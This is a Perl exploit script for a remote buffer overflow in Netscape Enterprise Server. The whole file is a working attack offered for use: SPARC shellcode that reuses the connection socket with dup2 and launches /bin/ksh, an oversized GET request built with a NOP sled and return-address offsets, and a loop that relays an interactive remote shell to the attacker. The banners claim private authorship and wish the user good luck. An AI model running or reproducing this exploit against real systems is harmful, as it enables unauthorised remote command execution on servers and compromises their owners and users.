#!/usr/bin/perl
use Socket;

# search the socket
$shellcode = "%aa%1d%40%15". # // xor  %l5, %l5, %l5
             "%ac%05%64%02". # // add  %l5, 1026, %l6
             "%ac%25%a0%01". # // dec  %l6
             "%90%05%40%16". # // add  %l5, %l6 , %o0
             "%82%10%20%f3". # // mov  0xf3, %g1
             "%91%d0%20%08". # // ta  8
             "%90%22%20%01". # // dec  %o0 - getpeername()
             "%80%a2%3f%ff". # // cmp  %o0, -1
             "%12%bf%ff%fa". # // be  -6      
# dup2(sock,0)  #
             "%aa%1d%40%15". # // xor  %l5, %l5, %l5
             "%90%05%40%16". # // add  %l5, %l6, %o0
             "%92%10%20%09". # // mov  9, %o1   
             "%94%22%40%09". # // sub  %o1, %o1, %o2
             "%82%10%20%3e". # // mov  0x3e, %g1
             "%91%d0%20%08". # // ta  8
# dup2(sock,1)  #
             "%aa%1d%40%15". # // xor  %l5, %l5, %l5
             "%90%05%40%16". # // add  %l5, %l6, %o0
             "%92%10%20%09". # // mov  9, %o1   
             "%94%05%60%01". # // add  %l5, 1, %o2
             "%82%10%20%3e". # // mov  0x3e, %g1
             "%91%d0%20%08". # // ta  8
# dup2(sock,2)  #
             "%aa%1d%40%15". # // xor  %l5, %l5, %l5
             "%90%05%40%16". # // add  %l5, %l6, %o0
             "%92%10%20%09". # // mov  9, %o1   
             "%94%05%60%02". # // add  %l5, 2, %o2
             "%82%10%20%3e". #// mov  0x3e, %g1
             "%91%d0%20%08". #// ta  8
# execve("/bin/ksh")  #
             "%20%bf%ff%ff". # // bn,a  <shellcode-4>
             "%20%bf%ff%ff". # // bn,a  <shellcode>
             "%7f%ff%ff%ff". # // call  <shellcode+4>
             "%90%03%e0%24". # // add  %o7, 32, %o0
             "%92%02%20%10". # // add  %o0, 16, %o1
             "%98%03%e0%24". # // add  %o7, 32, %o4
             "%c0%23%20%08". # // st  %g0, [%o4+8] 
             "%d0%23%20%10". # // st  %o0, [%o4+16]
             "%c0%23%20%14". # // st  %g0, [%o4+20] 
             "%82%20%3f%f5". # // sub  %g0, -0xb, g1
             "%91%d0%20%08". # // ta   8
              "/bin/ksh";
# 0xf99e1360
$offset = "%%f9%%9e%%13%%40";
$offset2 = "%%f9%%9e%%13%%60";
$nop_num = 40;
$nop = "%%80%%1b%%c0%%1f";
$align = 2;
$extra = 1000;
$cutrepad = 932;

print ("\nRemote Netscape Enterprise Server Exploit |\n");
print ("put into perl by \n\n");
print ("PRIVATE IC CODE - DON'T DISTRIBUTE - PRIVATE IC CODE\n");
print ("Distribute and die....\n\n");

if(@ARGV < 2) { die "usage: $0 <hostname> <port>\n"; }
my($host,$port) = @ARGV;
$port =~ /\d+/ || die "port isn't a valid number\n";
 
# Constructing buffer....
$buffer = "GET /" . "X"x$align . "$nop"x$nop_num . $shellcode;
$padd = $cutrepad - length($buffer);
$buffer .= "A"x$padd . "$offset"x7 . $offset2 . "a"x$extra . ".shtml 
HTTP/1.0";
print ("Good luck!\n");
$iaddr = inet_aton($host) || die "$host isn't up\n";
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die "socket error :$!\n";
connect(SOCKET, $paddr) || die "--- unable to establish connection 
($!)\n";
print("+++ connected to $host, $port\n");
send(SOCKET, "$buffer\r\n\r\n", 0);
sleep(3); # sleeping waiting for code to take affect
vec($rin, fileno(STDIN), 1) = 1;
vec($rin, fileno(SOCKET), 1) = 1;
for(;;) { # ripped from venglin cuz i'm lazy
$read = select($rout=$rin, undef, undef, undef);
 if (vec($rout, fileno(STDIN), 1) == 1) {
  if (sysread(STDIN, $recvbuf, 1024) == 0) { exit; }
send(SOCKET, $recvbuf, 0); }
 if (vec($rout, fileno(SOCKET), 1) == 1) {
  if (sysread(SOCKET, $recvbuf, 1024) == 0) { exit; }
syswrite(STDIN, $recvbuf, 1024);
  }
 }  
close Socket;
print "thanks for using this exploit carefully constructed by SteeLe\n";

 exit;